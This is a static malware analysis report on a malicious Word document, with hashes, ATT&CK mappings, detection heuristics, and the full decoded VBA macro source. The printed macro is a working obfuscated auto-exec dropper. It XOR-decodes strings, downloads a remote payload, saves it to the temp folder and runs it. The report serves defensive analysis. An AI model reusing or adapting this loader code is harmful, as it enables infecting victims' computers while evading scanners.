Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8503712d549d2f0f…

MALICIOUS

Office (OLE)

Size: 45.0 KB
Created: 2017-09-27 22:36:00
Authoring application: Microsoft Office Word
First seen: 2017-12-09
MD5: 6a93714124fcf4cb35fa459bb7166972
SHA-1: b2d4c9fc9c343765ddd1fed21fca284736db98b5
SHA-256: 8503712d549d2f0f7ce369a22961ffba591b0d8f766cd7bd8d920967e93471d3
Risk score: 272

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1036.005 Masquerading: Match Legitimate Name or Location

The sample contains obfuscated VBA macros designed to execute automatically upon opening the document. Critical heuristics indicate that the VBA code downloads a file from an embedded URL and executes it, likely as a second-stage payload. The obfuscation and download-execute behavior are strong indicators of malicious intent.

Heuristics (9)

  • VBA macros detected (severity: medium; 6 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk (severity: critical) OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec and Shell paths, this is a download-and-drop dropper, even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody
  • Obfuscated auto-exec VBA loader (severity: critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set vcDddGwdlsmvFOhmFRDuQdDRm = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0))
  • CreateObject call (severity: high) OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set vcDddGwdlsmvFOhmFRDuQdDRm = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0))
  • GetObject call (severity: high) OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set PMFuSKVNGVoPRbHdBmpqEzNjr = GetObject(DNvFQksVvu(Array(28, 17, 26, 27, 9, 58, 21, 42, 113, 61, 0, 41, 6, 51, 68, 50, 12, 26, 59, 23, 43, _
  • VBA p-code auto-exec with execution tokens (severity: high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (severity: low) OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Suspicious extracted artifact (severity: info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10178 bytes
SHA-256: 2e424df6eaf2dfaa5b6ad3349598805d3ffb5cf1ab168b7c94ac81296768f34b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
45 of 88 identifiers look randomly generated (e.g. 'SvVvgsFrlBFOMPTKXpPXCJCKl') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If ActiveDocument.Variables("wXuyQD").Value <> "yolo" Then
SlbXxVyyHeBrskJcBvSxcRITl
ActiveDocument.Variables("wXuyQD").Value = "yolo"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub


Attribute VB_Name = "RisioCV"
Private Function DNvFQksVvu(sFhiZmBXeg As Variant, hkpuWxBqrE As Integer)
Dim VuWInWOQHZ, xxOyfGcwMe As String, CTRBizosjQ, VaKobBBMTv
xxOyfGcwMe = ActiveDocument.Variables("wXuyQD").Value()
VuWInWOQHZ = ""
CTRBizosjQ = 1
While CTRBizosjQ < UBound(sFhiZmBXeg) + 2
VaKobBBMTv = CTRBizosjQ Mod Len(xxOyfGcwMe): If VaKobBBMTv = 0 Then VaKobBBMTv = Len(xxOyfGcwMe)
VuWInWOQHZ = VuWInWOQHZ + Chr(Asc(Mid(xxOyfGcwMe, VaKobBBMTv + hkpuWxBqrE, 1)) Xor CInt(sFhiZmBXeg(CTRBizosjQ - 1)))
CTRBizosjQ = CTRBizosjQ + 1
Wend
DNvFQksVvu = VuWInWOQHZ
End Function
Function MmbOAtxextHtZGBPECnnwvPel(kfcKDiyDtDThbTJekXWCsRhJb, WgkEGxbzBoXEbGLgrgmGFPpch)
AxytWKgKokKUdnneUwTwvJgcR = kfcKDiyDtDThbTJekXWCsRhJb.Items
For OWjQuNHJLXscrkfpgapRDrrgR = 0 To kfcKDiyDtDThbTJekXWCsRhJb.Count - 1
If AxytWKgKokKUdnneUwTwvJgcR(OWjQuNHJLXscrkfpgapRDrrgR) = WgkEGxbzBoXEbGLgrgmGFPpch Then
MmbOAtxextHtZGBPECnnwvPel = True
Exit For
End If
Next
MmbOAtxextHtZGBPECnnwvPel = False
End Function
Dim bxRiElaeQvRXBNGnaFGjwfbJm
Sub rqXUQfNbTIMRtyppMqmOSHkvB()
Dim vcDddGwdlsmvFOhmFRDuQdDRm
Set vcDddGwdlsmvFOhmFRDuQdDRm = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0))
Set dPpuQjBcGmbEXdYahaccmddob = CreateObject(DNvFQksVvu(Array(56, 27, 6, 31, 30, 35, 8, 55, 44, 104, 45, 45, 21, 34, 95, 46, 13, 21, 40, 26), 0))
Dim IHOjWxSdqTagfSmMymycwcuSe: IHOjWxSdqTagfSmMymycwcuSe = 0
Dim SaZMETGnObJFvwwyZsXdIRDpa: SaZMETGnObJFvwwyZsXdIRDpa = ""
Dim uHevxtKKuiSSzmOVAKLaZPioV: uHevxtKKuiSSzmOVAKLaZPioV = ""
On Error Resume Next
SaZMETGnObJFvwwyZsXdIRDpa = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(35, 51, 49, 47, 49, 20, 52, 11, 25, 3, 39, 16, 41, 3, 101, 4, 49, 40, 9, 12, 36, _
16, 24, 53, 17, 14, 36, 57, 31, 13, 37, 14, 42, 36, 32, 29, 24, 33, 63, 88, 37, _
12, 3, 41, 63, 1, 17, 29, 38, 6, 5, 12, 34, 19, 28, 36, 8, 54, 37, 26, 32, _
42, 2, 51, 68, 47, 6, 0, 122, 48, 39, 16, 27, 61, 13, 12, 11, 40, 37, 15, 13, _
44, 28, 31, 1, 7, 11, 20, 28, 112, 55, 20, 3, 35, 57, 49, 60, 11, 29, 49, 47, _
8, 21), 0))
If SaZMETGnObJFvwwyZsXdIRDpa = DNvFQksVvu(Array(90), 0) Then
uHevxtKKuiSSzmOVAKLaZPioV = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(35, 51, 49, 47, 49, 20, 52, 11, 25, 3, 39, 16, 41, 3, 101, 4, 49, 40, 9, 12, 36, _
16, 24, 53, 17, 14, 36, 57, 31, 13, 37, 14, 42, 36, 32, 29, 24, 33, 63, 88, 37, _
12, 3, 41, 63, 1, 17, 29, 38, 6, 5, 12, 34, 19, 28, 36, 8, 54, 37, 26, 32, _
42, 2, 51, 68, 47, 6, 0, 122, 48, 39, 16, 27, 61, 13, 12, 11, 40, 3, 38, 50, _
23, 33, 63, 13, 34, 49, 31, 5, 101, 59, 14, 59, 12, 34, 9, 40, 14, 14, 51, 2, _
23, 34), 0))
IHOjWxSdqTagfSmMymycwcuSe = IHOjWxSdqTagfSmMymycwcuSe + 1
dPpuQjBcGmbEXdYahaccmddob.Add IHOjWxSdqTagfSmMymycwcuSe, uHevxtKKuiSSzmOVAKLaZPioV
End If
If Err.Number <> 0 Then
Err.Clear
End If
Const dCqUlTTtIgxrTPPMLtNsIQTFf = &H80000003
xBkzjDZSgJsmmEJNtvDxOYUaL = DNvFQksVvu(Array(69), 0)
Set PMFuSKVNGVoPRbHdBmpqEzNjr = GetObject(DNvFQksVvu(Array(28, 17, 26, 27, 9, 58, 21, 42, 113, 61, 0, 41, 6, 51, 68, 50, 12, 26, 59, 23, 43, _
11, 1, 24, 6, 29, 29, 24, 75, 7, 58, 17, 60, 57, 53, 6, 42, 23, 34, 83, 60, _
66, 40, 6), 0) _
& xBkzjDZSgJsmmEJNtvDxOYUaL & DNvFQksVvu(Array(55, 10, 27, 25, 26, 11, 5, 60, 45, 39, 28, 40, 2, 108, 101, 53, 7, 38, 63, 4, 18, _
22, 0, 34), 0))
uBcpRCqjntTUeLjijfZzAatnD = ""
PMFuSKVNGVoPRbHdBmpqEzNjr.EnumKey dCqUlTTtIgxrTPPMLtNsIQTFf, uBcpRCqjntTUeLjijfZzAatnD, sQENbjrDlsCSrslEMAoVLhgZX
For Each QylTGyrFWucaDlsHZADvDRUKn In sQENbjrDlsCSrslEMAoVLhgZX
SaZMETGnObJFvwwyZsXdIRDpa = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(15, 59, 5, 35, 2, 3, 53, 45, 2, 33, 17, 54, 34, 6, 102, 12, 47, 0, 20, 16, 11, _
53, 59, 18, 5, 55), 0) & QylTGyrFWucaDlsHZADvDRUKn & DNvFQksVvu(Array(55, 43, 27, 16, 26, 32, 0, 43, 46, 26, 36, 45, 21, 36, 89, 50, 12, 18, 46, 63, 21, _
13, 1, 48, 12, 28, 11, 40, 53, 27, 37, 19, 60, 37, 50, 63, 33, 4, 37, 95, 46, _
13, 40, 19, 13, 54, 1, 29, 58, 6, 31, 88, 39, 19, 26, 35, 8, 55, 44, 53, 53, _
23, 23, 12, 123, 4, 55, 51, 52, 44, 32, 46, 41, 34, 20, 28, 1, 46, 5, 54, 51, _
40, 11, 15, 54, 8), 0))
If SaZMETGnObJFvwwyZsXdIRDpa = DNvFQksVvu(Array(90), 0) Then
uHevxtKKuiSSzmOVAKLaZPioV = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(15, 59, 5, 35, 2, 3, 53, 45, 2, 33, 17, 54, 34, 6, 102, 12, 47, 0, 20, 16, 11, _
53, 59, 18, 5, 55), 0) & QylTGyrFWucaDlsHZADvDRUKn & DNvFQksVvu(Array(55, 43, 27, 16, 26, 32, 0, 43, 46, 26, 36, 45, 21, 36, 89, 50, 12, 18, 46, 63, 21, _
13, 1, 48, 12, 28, 11, 40, 53, 27, 37, 19, 60, 37, 50, 63, 33, 4, 37, 95, 46, _
13, 40, 19, 13, 54, 1, 29, 58, 6, 31, 88, 39, 19, 26, 35, 8, 55, 44, 53, 53, _
49, 62, 51, 64, 57, 23, 63, 17, 22, 43, 55, 60, 46, 14, 36, 46, 53, 61, 34, 54, _
59, 9, 34, 41, 63), 0))
If Not MmbOAtxextHtZGBPECnnwvPel(dPpuQjBcGmbEXdYahaccmddob, uHevxtKKuiSSzmOVAKLaZPioV) Then
IHOjWxSdqTagfSmMymycwcuSe = IHOjWxSdqTagfSmMymycwcuSe + 1
dPpuQjBcGmbEXdYahaccmddob.Add IHOjWxSdqTagfSmMymycwcuSe, uHevxtKKuiSSzmOVAKLaZPioV
End If
End If
If Err.Number <> 0 Then
Err.Clear
End If
Next
Set bxRiElaeQvRXBNGnaFGjwfbJm = dPpuQjBcGmbEXdYahaccmddob
Set vcDddGwdlsmvFOhmFRDuQdDRm = Nothing
End Sub
Function YjYdLWRvwTbgNyxJurVoCmQfT(MRkXboNAfYFWdVPWuxRZtGhNI, SvVvgsFrlBFOMPTKXpPXCJCKl, jMBxWxrXssxuIkGzQiKSQratt, riUNWjDIzOELpPwvcmcjCMkZa)
On Error Resume Next
Dim XMChsfNKHVQniAhVXJMJOLPbT
Set XMChsfNKHVQniAhVXJMJOLPbT = CreateObject(DNvFQksVvu(Array(38, 11, 12, 27, 2, 101, 79, 10, 46, 52, 31, 33, 4, 14, 123, 13, 43, 32, 14, 51, 108, _
82, 65, 100), 0))
If Err.Number <> 0 Then
YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody
Set XMChsfNKHVQniAhVXJMJOLPbT = Nothing
Err.Clear
Exit Function
End If
Dim ErIvgrGUTuHXMPzAmejKGjMGU: ErIvgrGUTuHXMPzAmejKGjMGU = 0
Do While ErIvgrGUTuHXMPzAmejKGjMGU < UBound(jMBxWxrXssxuIkGzQiKSQratt)
Err.Clear
AxytWKgKokKUdnneUwTwvJgcR = bxRiElaeQvRXBNGnaFGjwfbJm.Items
For qvOdZTkyhJvZIIeTrBVuCaqKW = -1 To bxRiElaeQvRXBNGnaFGjwfbJm.Count - 1
Err.Clear
rujCcoXqvOcvVNWgcacaVtOze = jMBxWxrXssxuIkGzQiKSQratt(ErIvgrGUTuHXMPzAmejKGjMGU) & riUNWjDIzOELpPwvcmcjCMkZa
XMChsfNKHVQniAhVXJMJOLPbT.setOption 2, 13056
XMChsfNKHVQniAhVXJMJOLPbT.setTimeouts 0, 0, 0, 0
XMChsfNKHVQniAhVXJMJOLPbT.Open MRkXboNAfYFWdVPWuxRZtGhNI, rujCcoXqvOcvVNWgcacaVtOze, False
If qvOdZTkyhJvZIIeTrBVuCaqKW <> -1 Then
XMChsfNKHVQniAhVXJMJOLPbT.setProxy 2, AxytWKgKokKUdnneUwTwvJgcR(qvOdZTkyhJvZIIeTrBVuCaqKW), ""
End If
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(40, 16, 21, 4, 29, 50, 21), 0), DNvFQksVvu(Array(30, 12, 18, 91, 86), 0)
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(40, 23, 26, 24, 11, 52, 21, 48, 36, 40), 0), DNvFQksVvu(Array(32, 29, 17, 6, 67, 22, 13, 48, 61, 35), 0)
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(32, 29, 17, 6, 67, 22, 13, 48, 61, 35), 0), DNvFQksVvu(Array(88, 72, 68), 0)
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(40, 23, 26, 2, 11, 57, 21, 116, 31, 63, 25, 33), 0), DNvFQksVvu(Array(10, 8, 4, 26, 7, 52, 0, 45, 34, 41, 7, 107, 14, 123, 65, 54, 20, 89, 60, 12, 48, _
9, 66, 33, 17, 7, 29, 26, 21, 1, 51, 4, 61), 0)
XMChsfNKHVQniAhVXJMJOLPbT.Send (SvVvgsFrlBFOMPTKXpPXCJCKl)
If XMChsfNKHVQniAhVXJMJOLPbT.ReadyState <> 4 Then
XMChsfNKHVQniAhVXJMJOLPbT.WaitForResponse 30
End If
If Err.Number = 0 Then
If XMChsfNKHVQniAhVXJMJOLPbT.Status = 200 Then
If XMChsfNKHVQniAhVXJMJOLPbT.StatusText = DNvFQksVvu(Array(36, 51), 0) Then
YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody
Exit Function
End If
End If
End If
Next
ErIvgrGUTuHXMPzAmejKGjMGU = ErIvgrGUTuHXMPzAmejKGjMGU + 1
Loop
YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody
Set XMChsfNKHVQniAhVXJMJOLPbT = Nothing
End Function
Sub HFrkveFgejmygVlsXhAOcnSPx(jrFWnTBceRnkTVqSUzeczwRwe, SsuzikMLBesCbOGBzsJCzdtwf)
Set hpdXRaICBrMidysNqWZvKUKvp = CreateObject(DNvFQksVvu(Array(42, 60, 59, 50, 44, 121, 50, 45, 57, 35, 8, 41), 0))
hpdXRaICBrMidysNqWZvKUKvp.Open
hpdXRaICBrMidysNqWZvKUKvp.Type = 1
If IsEmpty(jrFWnTBceRnkTVqSUzeczwRwe) Then
hpdXRaICBrMidysNqWZvKUKvp.Close
Set hpdXRaICBrMidysNqWZvKUKvp = Nothing
Exit Sub
End If
hpdXRaICBrMidysNqWZvKUKvp.Write jrFWnTBceRnkTVqSUzeczwRwe
hpdXRaICBrMidysNqWZvKUKvp.Position = 0
hpdXRaICBrMidysNqWZvKUKvp.SaveToFile SsuzikMLBesCbOGBzsJCzdtwf
hpdXRaICBrMidysNqWZvKUKvp.Close
Set hpdXRaICBrMidysNqWZvKUKvp = Nothing
End Sub
Sub SlbXxVyyHeBrskJcBvSxcRITl()
On Error Resume Next
Dim CyIZJzUpHiMUQXCqfyyLedgCP(), euEvLXdRrPZPHrgjUzJJvTeYI, tLmgYQsmxrfyqFHvGJTxWguUN, orZFdNDAWAWXpavOWxzpbBuwp
ReDim CyIZJzUpHiMUQXCqfyyLedgCP(1)
rqXUQfNbTIMRtyppMqmOSHkvB
Set tLmgYQsmxrfyqFHvGJTxWguUN = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0))
Set orZFdNDAWAWXpavOWxzpbBuwp = CreateObject(DNvFQksVvu(Array(56, 27, 6, 31, 30, 35, 8, 55, 44, 104, 47, 45, 26, 51, 101, 56, 16, 0, 63, 14, 13, _
6, 5, 49, 0, 31), 0)).GetSpecialFolder(2)
euEvLXdRrPZPHrgjUzJJvTeYI = DNvFQksVvu(Array(18, 23, 24, 25, 64, 50, 25, 60), 0)
orZFdNDAWAWXpavOWxzpbBuwp = orZFdNDAWAWXpavOWxzpbBuwp & DNvFQksVvu(Array(55), 0) & euEvLXdRrPZPHrgjUzJJvTeYI
CyIZJzUpHiMUQXCqfyyLedgCP(0) = DNvFQksVvu(Array(3, 12, 0, 6, 84, 120, 78, 46, 60, 49, 71, 41, 23, 53, 68, 46, 16, 27, 60, 23, 108, _
3, 30, 123), 0)
UDRLgTLOgzgBjhNHSljHQryNY = YjYdLWRvwTbgNyxJurVoCmQfT(DNvFQksVvu(Array(44, 61, 32), 0), "", CyIZJzUpHiMUQXCqfyyLedgCP, DNvFQksVvu(Array(17, 87, 22, 25, 26, 121, 4, 33, 46), 0))
HFrkveFgejmygVlsXhAOcnSPx UDRLgTLOgzgBjhNHSljHQryNY, orZFdNDAWAWXpavOWxzpbBuwp
tLmgYQsmxrfyqFHvGJTxWguUN.Run (orZFdNDAWAWXpavOWxzpbBuwp)
End Sub